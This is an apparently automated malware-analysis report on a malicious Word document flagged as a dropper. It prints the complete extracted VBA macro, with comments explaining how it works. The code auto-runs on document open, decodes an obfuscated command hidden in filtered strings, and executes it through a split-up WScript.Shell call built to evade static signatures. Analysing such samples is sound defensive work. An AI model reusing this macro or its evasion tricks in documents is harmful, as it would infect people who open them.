MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro is obfuscated and uses a GetObject call, indicating it is designed to execute code. The ClamAV detection name 'Doc.Dropper.Agent-6619947-0' strongly suggests its purpose is to download and execute a secondary payload. The presence of a Document_Open macro further supports this, as it is commonly used to initiate malicious actions upon opening the document.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6619947-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6619947-0
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
GetObject call — high — OLE_VBA_GETOBJ: GetObject call. Matched line in script:
ixoxewrspr = 152 GetObject("", "wS" & ThisDocument.jungleunder() & bananacorn()).exec awnhmwjdijteeqq Dim qldxtoxqkitedy As Boolean -
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Dim xueahlhjmyygobbjm Public Sub Document_Open() Dim kitpigeon As Boolean -
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
- http://purl.org/dc/elements/1.1/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 8ec79f4ab1494f7ae028eaeaf08519563352fe44c783590a6f1856c846a23eb0) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11450 bytes |
Preview script — first 1,000 lines of the extracted script
' Module header emitted by olevba for the "ThisDocument" code module of the carved macros.bas.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module-level Variant. Document_Open assigns it a string of "filter" characters;
' awesomeskull() reads it to decide which characters to drop from the encoded payload.
Dim xueahlhjmyygobbjm
' Auto-run entry point: Word executes this when the document is opened (the page's
' OLE_VBA_DOCOPEN heuristic). Ignoring the padding, it does three things:
'   1. types a placeholder string into the document body (Selection.TypeText),
'   2. sets the module-level filter string xueahlhjmyygobbjm,
'   3. calls hzferblfhuh, which decodes the payload string and passes it to
'      Module1.notablesun for execution.
' Everything else in this Sub is obfuscation padding: Dim/assignment pairs whose
' values are compared only against literals and never referenced elsewhere in the
' extracted source, plus random-word comments. Note that several of the padding
' locals are declared As Boolean and assigned integers; VBA coerces those to
' True (-1), so the numeric comparisons on them do not mean what the literals suggest.
Public Sub Document_Open()
Dim kitpigeon As Boolean
kitpigeon = 221
If kitpigeon > 37 Then
Dim nmqfkceltfjo As Integer
nmqfkceltfjo = 139
Dim akfpfzjzmugewdznox As Integer
akfpfzjzmugewdznox = 29
Dim festivalobtain As String
festivalobtain = "xkgadsrnamkg"
End If
' User-visible side effect: inserts "... ... .." and a line break at the cursor,
' likely so the document does not look empty while the macro runs.
Selection.TypeText ("... ... .." & vbCrLf)
Dim chalkslim As Integer
chalkslim = 208
If chalkslim = 59 Then
Dim hbijdvnozybfl As String
hbijdvnozybfl = "srvxvitwpbimf"
Dim buzzfeature As String
buzzfeature = "tbzxbpckoedwyt"
End If
Dim dzaoolrfomgzm As Boolean
dzaoolrfomgzm = 93
'jliuwhphufpggracestone
If dzaoolrfomgzm > 52 Then
Dim fitnessmatch As Double
fitnessmatch = 88
Dim yvqqjjgzszyuz As Boolean
yvqqjjgzszyuz = 148
'archlakeeditsatoshi
Dim gszhtckuisoqhuwq As Integer
gszhtckuisoqhuwq = 155
'ljgxechtraxccnujovsc
End If
' The decoder's "alphabet of noise": any character of the encoded payload that
' appears in this string is discarded by awesomeskull(); the rest is kept.
xueahlhjmyygobbjm = "@ZKQg5}j+16<644!*_}1$$<v6BRB<6V>juK="
Dim bouncepepper As Byte
bouncepepper = 70
Dim clogdonkey As Integer
clogdonkey = 187
Dim donkeysuccess As String
donkeysuccess = "admituncover"
Dim nykbefkfehq As Integer
nykbefkfehq = 90
Dim pctiockupil As Boolean
pctiockupil = 242
' Decode and execute (see hzferblfhuh below).
hzferblfhuh
Dim labelseed As Boolean
labelseed = 212
If labelseed <> 206 Then
Dim feetrigger As Double
feetrigger = 86
'qxbozngzzmmfjirjqbuxttctzajwlmqpmmt
Dim brandkey As String
brandkey = "dashoil"
Dim noblenorth As Boolean
noblenorth = 3
Dim dyxmcwdbqlpy As Double
dyxmcwdbqlpy = 57
'artworkvividnuvjwxnwqjhogztcug
End If
End Sub
' Returns the second half of the encoded payload: the literal stored in bossproud
' followed by a second literal. The only caller is hzferblfhuh, which appends this
' to its own literal before decoding. bossproud is never declared (no Option Explicit
' in the extracted source), so it is an implicit Variant.
Function sgptplzrzguybk()
Dim orfvhyefope As Long
orfvhyefope = 117
'mwuqhqvwqgggbycdangershallow
Dim pointseven As Integer
pointseven = 91
Dim pelicantask As Long
pelicantask = 204
Dim sprsksbupe As Integer
sprsksbupe = 66
' Encoded fragment; still contains the filter characters set in Document_Open.
bossproud = "1= }5byPARs@+sZ_6 v($Z!NREw6-6$O=bg__JVEgc4T=1 646SByQBST6em.@NRE+KtgV.Wveggb>1C$lI1egvN}4TB61).KDQo=W>QNjL>}o+KaD@ZFQI6lKe*(*'hZv$tZ@t4p:6/6/RlZ<n<>k$d4u!a}d1m<6in4"
sgptplzrzguybk = bossproud & ".464c+o!Bm461/Ze6ZuraVu/vTjBD1YB.1<e<xev'+,u}'%T!EM6BPj%_+K\1\9Ks6$!.Be4_x6e')K61 &! 1=%TBQEg1M6P%\j\_<91s}.e}xe"
Dim fqlzyrgtbea As Boolean
fqlzyrgtbea = 62
Dim governobject As Double
governobject = 144
'hrdheyhmcvratmfcpvrnezahimosj
Dim umegxquxjlqkphm As Double
umegxquxjlqkphm = 142
Dim yqowwogzkppzcvyxj As Long
yqowwogzkppzcvyxj = 178
'scripttimecbyjnvnyu
End Function
' Per-character filter used by the decoder loop in hzferblfhuh.
'   rbhkgdphfuwvvuniq: one character of the encoded payload (passed as a Variant).
'   Returns "" when that character occurs anywhere in the module-level string
'   xueahlhjmyygobbjm (tested with Like "*" & ch & "*"), otherwise returns the
'   character unchanged. So the decode is simply "delete every character that is
'   in the filter alphabet". Note that Like treats ?, *, # and [ as pattern
'   metacharacters, so those inputs are matched as wildcards, not literally.
' The If/Else branches are padded with unused locals; only the two assignments to
' retVarbhkgdphfuwvvuniq matter.
Function awesomeskull(rbhkgdphfuwvvuniq)
Dim brassdose As Integer
brassdose = 15
'vmkncvnoydkjvcrkzzkjhctkjkhv
If brassdose < 134 Then
Dim servicetarget As Integer
servicetarget = 190
Dim droppush As Integer
droppush = 177
End If
' Default: drop the character.
retVarbhkgdphfuwvvuniq = ""
If xueahlhjmyygobbjm Like "*" & rbhkgdphfuwvvuniq & "*" Then
Dim toyaoyywdkvsve As Byte
toyaoyywdkvsve = 28
Dim acididea As Boolean
acididea = 234
Dim zzshmqnrxczucqmgal As Long
zzshmqnrxczucqmgal = 228
'asthmahiddenwjryphurtgctw
Dim awayrent As String
awayrent = "wcouvinmgcji"
Dim inviteround As String
inviteround = "agzbhoxzcacaqoyx"
Dim blameharvest As Integer
blameharvest = 113
'advicebulkbiutayohaj
Dim tomorrowupset As Boolean
tomorrowupset = 39
'dashsubwayavocadocart
Dim dvyssskkpniykj As String
dvyssskkpniykj = "kawohpetpczxm"
Dim fsfwmjtpnucogozase As Boolean
fsfwmjtpnucogozase = 4
Else
Dim idlemultiply As Long
idlemultiply = 56
If idlemultiply > 210 Then
Dim ugppgvizmmqoidi As Integer
ugppgvizmmqoidi = 208
'csfkdvkxwouogyrgfnlcqbdrqviwyijveitg
Dim mzblsfnbviiq As Integer
mzblsfnbviiq = 153
Dim degreefever As Byte
degreefever = 234
'controlletternoticeweasel
Dim draftquarter As String
draftquarter = "suhkzxocxzx"
'junkloudaskkgxovdv
Dim educatehover As Boolean
educatehover = 225
'qkqaqabrqtypowhgssmoothtwenty
End If
' Character is not in the filter alphabet: keep it.
retVarbhkgdphfuwvvuniq = rbhkgdphfuwvvuniq
Dim pcdpfcmmufmu As String
pcdpfcmmufmu = "ableglue"
Dim pdptjlnhnpyza As Integer
pdptjlnhnpyza = 83
Dim burdenpitch As String
burdenpitch = "aipzejdgzfetauwq"
Dim courseturkey As Integer
courseturkey = 170
Dim mahfhtzkpdnbdgrv As Integer
mahfhtzkpdnbdgrv = 152
'remaintouristadaptnothing
Dim nqneukmutbtotilnmmw As Byte
nqneukmutbtotilnmmw = 177
'xivfacdlzivfdyacivkfdigxnry
End If
awesomeskull = retVarbhkgdphfuwvvuniq
Dim mixsafe As Double
mixsafe = 90
'findstrongenactproud
If mixsafe < 248 Then
Dim puqrkzvjbfci As Byte
puqrkzvjbfci = 140
Dim clawtag As Integer
clawtag = 185
End If
End Function
' Decoder and dispatcher, called from Document_Open.
'   1. Assembles the full encoded string: a literal & sgptplzrzguybk().
'   2. Walks it one character at a time with Mid(), keeps only the characters
'      awesomeskull() passes through, and accumulates them in divideinmate.
'   3. Hands the decoded string to Module1.notablesun, which executes it.
' The command line therefore never exists contiguously in the file; only the two
' encoded fragments and the filter alphabet are static. bqenwrsoublv, divideinmate,
' yjzfsjfijrh, rbhkgdphfuwvvuniq and bvkoinmaad are undeclared implicit Variants.
' All other locals in this Sub are padding that nothing reads.
Sub hzferblfhuh()
Dim allswim As Long
allswim = 73
Dim qjdaisqtwmhyoagtrdx As Double
qjdaisqtwmhyoagtrdx = 144
Dim drinksize As Byte
drinksize = 27
Dim jmtjiyvavchjzb As Integer
jmtjiyvavchjzb = 213
Dim gzhonlgatg As Double
gzhonlgatg = 56
' Full encoded payload = first fragment (here) & second fragment (sgptplzrzguybk).
bqenwrsoublv = "C>$m1*Dj.eKX!BE<j /u6C4R Z@P+o4we_rsKhELjL}.e$@x=eB< jR-Z1w46VI55NBD6Bo_WR<SZTQyv_lKe1 _Hj}IV4dg<De61N4 54-gN5oPur6O_jFjil5E_$ }-j*6EX!1jE+5CBUuTVIVOn6P_O}_ZLIK6c=Ky" & sgptplzrzguybk()
' Accumulator for the decoded output.
divideinmate = ""
Dim lwyyvmkkaqndlu As Long
lwyyvmkkaqndlu = 189
If lwyyvmkkaqndlu = 120 Then
Dim slabsolution As Long
slabsolution = 249
Dim debrispraise As Boolean
debrispraise = 118
Dim magicpitch As Byte
magicpitch = 174
End If
' Character-by-character filter loop (1-based, Mid(s, i, 1)).
For yjzfsjfijrh = 1 To Len(bqenwrsoublv)
Dim fitsuit As Long
fitsuit = 110
If fitsuit < 160 Then
Dim dizzyeye As Long
dizzyeye = 254
Dim leavesubject As Boolean
leavesubject = 55
Dim axisonline As String
axisonline = "damageone"
Dim ngilbhdsllww As Long
ngilbhdsllww = 200
'storytypezfmhrtkexmzfiackqem
Dim couchunlock As Byte
couchunlock = 121
'zdwqmgllbdjlfsjakgbdfgv
End If
Dim askvocal As Integer
askvocal = 199
Dim oidkoxcmsidpdwcefil As Long
oidkoxcmsidpdwcefil = 92
rbhkgdphfuwvvuniq = Mid(bqenwrsoublv, yjzfsjfijrh, 1)
' "" if the character is in the filter alphabet, else the character itself.
bvkoinmaad = awesomeskull(rbhkgdphfuwvvuniq)
Dim drumtired As Double
drumtired = 141
Dim guiltspread As Long
guiltspread = 166
'escapeskatetryqfvukrvdeecs
Dim dampraccoon As Byte
dampraccoon = 207
Dim actshy As Boolean
actshy = 175
'dgtzjgszkrwzhuvopuclsu
Dim apxxnhfucbwnrdyx As Double
apxxnhfucbwnrdyx = 186
'fthuqsvfvmxepwzzxjlljgdcmeefcv
If apxxnhfucbwnrdyx <> 234 Then
Dim clutchtrue As Long
clutchtrue = 216
Dim dutyfortune As Double
dutyfortune = 182
Dim mcujaqnfq As Long
mcujaqnfq = 55
Dim qnqunewzhzta As Long
qnqunewzhzta = 222
End If
divideinmate = divideinmate & bvkoinmaad
Dim belowjealous As Integer
belowjealous = 127
'eqwrnizaurmdmbkylxbwhufvviqrc
If belowjealous = 162 Then
Dim disorderslow As Integer
disorderslow = 234
Dim diagramnerve As Byte
diagramnerve = 126
'cugweytpysrhjcmrfrostplate
End If
Next
' Execute the decoded string; notablesun's return value (3020) is discarded here.
Module1.notablesun (divideinmate)
End Sub
' Returns the string "crIPt." — the middle fragment of the ProgID that notablesun
' assembles ("wS" & jungleunder() & bananacorn()). Splitting the name across three
' functions with mixed case is what keeps "WScript.Shell" out of the static source.
' operasoul is an undeclared implicit Variant; the rest of the locals are padding.
Function jungleunder()
Dim keynormal As Integer
keynormal = 217
Dim ipcoonhomzjlu As Integer
ipcoonhomzjlu = 199
'textweirdobjecttank
Dim suevtirjuglewbpbq As Byte
suevtirjuglewbpbq = 86
Dim crimeexhaust As Double
crimeexhaust = 28
'drillshovevvdiyegonj
operasoul = "t."
jungleunder = "crIP" & operasoul
Dim chalkstyle As Integer
chalkstyle = 13
'dignityonealonethunder
Dim flowerjuice As Byte
flowerjuice = 215
Dim elbowjewel As Long
elbowjewel = 141
Dim jntovieoqxe As Boolean
jntovieoqxe = 239
End Function
' olevba concatenates every module into one listing; the functions below belong to
' the standard module "Module1" (referenced as Module1.notablesun from hzferblfhuh).
Attribute VB_Name = "Module1"
' Returns the string "SHelL": Chr(83) = "S", Chr(72) = "H", then the literals "e"
' and "lL" stored in the undeclared Variants sfczeroeyfnctm and interestrecall.
' This is the last fragment of the ProgID built in notablesun. Every Dim/assignment
' pair and If block in this function is padding; only the three assignments that
' feed the final concatenation are live.
Function bananacorn()
Dim hzcpqjjcevjkhyddnn As Boolean
hzcpqjjcevjkhyddnn = 168
'apbrgbdnmbkghwifanhorn
If hzcpqjjcevjkhyddnn > 74 Then
Dim chatuncle As Boolean
chatuncle = 10
'izzuejsumbhenaunwgunxsslowobxpjxssg
Dim hcsvwgldr As Byte
hcsvwgldr = 122
Dim ghpcbnopfcgvr As Double
ghpcbnopfcgvr = 78
'homevideorzffjxamajyezlriul
Dim lengthnature As Integer
lengthnature = 225
End If
Dim dyrpsnlckrppepokpdt As Double
dyrpsnlckrppepokpdt = 121
'yfrofcuufuwoxixutmubaopstaew
If dyrpsnlckrppepokpdt = 225 Then
Dim uhoctjuceqluck As Byte
uhoctjuceqluck = 28
Dim outputsave As Integer
outputsave = 8
'confirmstuffleavevague
Dim autobest As Long
autobest = 247
End If
sfczeroeyfnctm = "e"
Dim diagramstart As Double
diagramstart = 80
Dim iconrebel As Long
iconrebel = 248
Dim vmfeusirbidmaw As Boolean
vmfeusirbidmaw = 248
Dim knocktransfer As Integer
knocktransfer = 131
Dim rprroajvsrqeby As Integer
rprroajvsrqeby = 107
Dim inquiryuseless As Byte
inquiryuseless = 147
interestrecall = "lL"
Dim mlptfditexlljfdihr As Double
mlptfditexlljfdihr = 64
'purposewetmdysltmuetwf
If mlptfditexlljfdihr <> 17 Then
Dim swarmutility As Double
swarmutility = 32
'hourpalaceqagecpzai
Dim lxtqwumlwuzqepty As Double
lxtqwumlwuzqepty = 229
Dim xpyvuxsbkemmy As Double
xpyvuxsbkemmy = 172
Dim copperfrost As Double
copperfrost = 246
'fetwsoortjhmvnpftmileazgirntm
Dim whtjuikrkdarpmvl As Double
whtjuikrkdarpmvl = 132
'rowhplahwjjinuuxmfwdzwguxfajccz
End If
Dim kkehgezgbixqnhspz As Boolean
kkehgezgbixqnhspz = 200
'armorbirduzkzpjhylijhmwnbwe
If kkehgezgbixqnhspz > 105 Then
Dim ybjavxbmaohbsrmz As Byte
ybjavxbmaohbsrmz = 189
Dim anotherhip As Long
anotherhip = 48
'endfaintcrytime
End If
' "S" & "H" & "e" & "lL"
bananacorn = Chr(83) & Chr(72) & sfczeroeyfnctm & interestrecall
Dim elevatorobtain As Double
elevatorobtain = 184
Dim mhpazctxflmmiuzl As String
mhpazctxflmmiuzl = "jjjakfvjwma"
Dim udffdvioxabfmds As Double
udffdvioxabfmds = 161
If udffdvioxabfmds <> 236 Then
Dim ckwyfqqkjhqrkv As Integer
ckwyfqqkjhqrkv = 215
Dim angerthing As Integer
angerthing = 65
Dim txyrneofegsy As Double
txyrneofegsy = 245
'obtainpullbuildexcite
End If
End Function
' Returns the string "RUN" (Chr(82) = "R", "U", Chr(78) = "N"). Nothing in the
' extracted source calls this function — either dead code left by the builder or a
' fragment meant for a variant that uses .Run instead of .exec. Locals are padding.
Function gloveski()
Dim gaugelawn As Long
gaugelawn = 54
'smallstockenvelopeunfold
If gaugelawn = 70 Then
Dim ydirkahqua As Long
ydirkahqua = 130
Dim fxnodubdnqqqfuhrej As Boolean
fxnodubdnqqqfuhrej = 200
End If
Dim cathole As Integer
cathole = 163
If cathole > 182 Then
Dim halfoblige As Byte
halfoblige = 249
'jrzogxjjjspwrdebttfxdlyzkkpotw
Dim immuneprotect As Double
immuneprotect = 42
Dim foldmaterial As Boolean
foldmaterial = 70
Dim orbjlwznbagdcvvlg As Byte
orbjlwznbagdcvvlg = 34
'wybbpadrqhkxdtblwiwffetioslalczoy
Dim spirittoken As String
spirittoken = "igrshipieqrtp"
End If
gloveski = Chr(82) & "U" & Chr(78)
End Function
' Execution sink. Called from ThisDocument.hzferblfhuh with the decoded string.
'   awnhmwjdijteeqq: the decoded command line (implicit Variant).
'   Returns 3020; the caller discards it.
' The ProgID is assembled at run time as "wS" & "crIPt." & "SHelL", i.e. a
' case-variant spelling of WScript.Shell, and GetObject with an empty first
' argument creates a new instance of that class rather than opening a file.
' .exec then runs the argument. Because the ProgID never appears contiguously
' in the source, a plain string signature for "WScript.Shell" would miss this;
' the page's OLE_VBA_GETOBJ heuristic keys on the GetObject call itself, and
' the decoded command is only observable at run time (sandbox / script-host
' logging), not statically.
Function notablesun(awnhmwjdijteeqq)
Dim xatneqjggkube As Integer
xatneqjggkube = 112
'includemedalywqvylcyirrjmegwxp
Dim xoiajhqubfewokyy As Boolean
xoiajhqubfewokyy = 59
Dim ukpbwjctcklxdrzh As Integer
ukpbwjctcklxdrzh = 172
'yxqefiebnxhnjssdofbfxmthx
Dim hugeplace As Byte
hugeplace = 24
Dim ixoxewrspr As Byte
ixoxewrspr = 152
' "wS" & jungleunder() ("crIPt.") & bananacorn() ("SHelL") -> WScript.Shell; .exec runs the decoded string.
GetObject("", "wS" & ThisDocument.jungleunder() & bananacorn()).exec awnhmwjdijteeqq
Dim qldxtoxqkitedy As Boolean
qldxtoxqkitedy = 191
Dim armyhotel As Long
armyhotel = 235
'pkolnuvcenmnzqeeidyh
Dim dbevhqaaixfxsynvbet As Double
dbevhqaaixfxsynvbet = 96
If dbevhqaaixfxsynvbet <> 198 Then
Dim umfignzqnpijajkxygg As String
umfignzqnpijajkxygg = "closemeadow"
Dim cargiraffe As Byte
cargiraffe = 30
'doddroxnogjfbravethen
Dim hywnjcyoxj As Double
hywnjcyoxj = 106
Dim loyalrepair As String
loyalrepair = "leisuresoft"
Dim furyrubber As Double
furyrubber = 137
'ekrpnrrzgpsiilopwgjvby
End If
' Arbitrary constant return value; not used by the caller.
notablesun = 3020
Dim absorbflower As Boolean
absorbflower = 86
'chunksubjectxrbguwquhza
If absorbflower > 226 Then
Dim palmsquare As Integer
palmsquare = 144
Dim bxqeqakazerlcktpk As Boolean
bxqeqakazerlcktpk = 235
'edgemovieholemenu
End If
End Function
|
|||